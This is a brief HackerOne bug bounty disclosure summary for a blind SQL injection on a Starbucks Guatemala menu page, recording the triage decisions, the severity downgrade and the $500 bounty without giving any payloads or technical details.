Starbucks: Blind SQL Injection on starbucks.com.gt and WAF Bypass :*

2019-04-27T15:23:27
ID H1:549355
Type hackerone
Reporter d3417_
Modified 2019-06-19T16:55:24

Description

Starting with a blind SQL Injection on http://www.starbucks.com.gt/menu/beverage/detail, @d3417_ was able to dump schema on several database tables. Initially closed as N/A because of our exclusion on automated tools, reopened to investigate the data reported in the tables, and because the casual use of an sqlmap command doesn't meet our usual definition of an automated scan. Downgraded from Critical to High, and awarded $500 bounty, because of the limited nature of the data exposed in these tables. Disclosure requested, but since much of the ticket would need to be redacted in order to remove database/table/schema/field names, we're releasing the summary and timeline only. Thanks to @d3417_ for reporting this.